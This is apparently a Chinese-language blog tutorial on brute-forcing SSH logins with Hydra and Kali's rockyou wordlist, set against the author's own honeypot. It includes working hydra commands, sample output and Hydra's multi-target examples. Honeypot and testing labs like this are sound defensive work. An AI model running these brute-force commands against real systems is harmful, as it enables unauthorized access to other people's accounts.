close

現場: Kali Linux 套件:hydra + rockyou 字典檔

 


警告:

 

這個LAB只能用在自己的環境下測試,

 

千萬不可以用在任何攻擊他人或者觸犯法律的行為上。

 


處理方式:

 

透過kali 自帶的字典檔來進行攻擊測試。

 

字典檔的位置/usr/share/wordlists/,他被封裝成一個.gz壓縮檔

 

我們來解開測試。

 

root@tkb-kali:~# gzip -d /usr/share/wordlists/rockyou.txt.gz

 

有了字典檔,我們就可以用他來進行攻擊的測試。

 

#hydra -s 62222 -v -l root -P /usr/share/wordlists/rockyou.txt <測試被攻擊的IP> ssh

 

(-s後面帶port 號,-v 表示秀出訊息,-l 表示使用帳號,-P後面帶字典檔,最

 

後是攻擊IP以及協定方式<這邊也可以用ssh://IP位址表示> )

 

#!##############

 

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use....

 

Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-02 ...

 

[WARNING] Many SSH configurations limit the number o.....

 

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 l...

 

[DATA] attacking ssh://攻擊目標:62222/

 

[VERBOSE] Resolving addresses ... [VERBOSE] resolving done

 

[INFO] Testing if password authentication is supported \

 

by ssh://root@攻擊目標:62222

 

[INFO] Successful, password authentication is supported \

 

by ssh://攻擊目標:62222

 

最後會跟你說預測時間要多久,但我們只是要取得數值而已。

 

[STATUS] 656.00 tries/min, 656 tries in 00:01h, 14343743 to do in 364:26h, 16 active

 

#!####################

 

所以這樣就夠了,之後我們到密罐中看看攻擊的情況。

 

可以看到前面的username是我們定義的那個樣子,而passoword欄位就是字典檔內的密碼字庫。

 

 

Hydra 還有很多種有去的攻擊組合方式,再請大家去查詢。

 


後記:

 

HYDRA 為支援的網路服務類型。

 

  • afp

  • cisco

  • cisco-enable

  • cvs

  • firebird

  • ftp

  • http-get

  • http-head

  • http-proxy

  • https-get

  • https-head

  • https-form-get

  • https-form-post

  • icq

  • imap

  • imap-ntlm

  • ldap2

  • ldap3

  • mssql

  • mysql

  • ncp

  • nntp

  • oracle-listener

  • pcanywhere

  • pcnfs

  • pop3

  • pop3-ntlm

  • postgres

  • rexec

  • rlogin

  • rsh

  • sapr3

  • sip

  • smb

  • smbnt

  • smtp-auth

  • smtp-auth-ntlm

  • snmp

  • socks5

  • ssh2

  • svn

  • teamspeak

  • telnet

  • vmauthd

  • vnc

 

 


 

使用# hydra -h 也可以看到測試方法

 

Examples:

 

hydra -l user -P passlist.txt ftp://192.168.0.1

 

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

 

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

 

hydra -l admin -p password ftp://[192.168.0.0/24]/

 

hydra -L logins.txt -P pws.txt -M targets.txt ssh

 

(本篇完)

 

參考網址:

 

https://www.qa-knowhow.com/?p=2774

 

http://topspeedsnail.com/kydra-crack-ssh-and-avoid-attack/

 

 

arrow
arrow
    全站熱搜

    IT001 發表在 痞客邦 留言(0) 人氣()